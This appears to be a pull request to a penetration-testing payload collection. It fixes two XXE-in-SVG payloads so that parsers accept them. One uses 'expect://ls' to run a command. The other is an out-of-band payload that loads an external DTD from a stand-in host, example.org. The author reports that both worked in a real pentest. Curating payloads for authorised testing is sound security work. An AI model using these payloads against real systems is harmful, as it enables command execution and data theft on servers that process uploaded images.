### PR TITLE
improved XXE SVG payloads to be valid XMLs

### DIFF
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -419,7 +419,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
 
 ```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
-    <image xlink:href="expect://ls"></image>
+    <image xlink:href="expect://ls" width="200" height="200"></image>
 </svg>
 ```
 
@@ -438,6 +438,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
 *xxe.svg*
 
 ```xml
+<?xml version="1.0" standalone="yes"?>
 <!DOCTYPE svg [
 <!ELEMENT svg ANY >
 <!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">


### PR DESCRIPTION
Hi,

while testing for XXEs in SVG I needed to make some changes so that the payloads are treated as valid XMLs. I thought it's worth doing a pr so that nobody misses an XXE because of lack of required attribute.

I fixed 2 things actually:
### image tag for XXE inside SVG
I was validating my payloads [here](https://validator.w3.org/#validate_by_input+with_options) and when you use _Validate by Direct Input_, choose _SVG 1.1_ DOCTYPE and paste 
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
    <image xlink:href="expect://ls"></image>
</svg>
```
There are 2 errors:

> Line 2, Column 36: required attribute "width" not specified 
> \<image xlink:href="expect://ls">\</image>
> The attribute given above is required for an element that you've used, but you have omitted it

and the same for height.

Thus I added them to the XXE SVG payload.

### xml tag in OOB via SVG rasterization
I added XML tag as without it my payload was causing exceptions. On the aforementioned validator it's still not considered valid, but adding it made the payload work in my case.

**Both fixes made my XXE work during the pentest and those payloads didn't work without them.**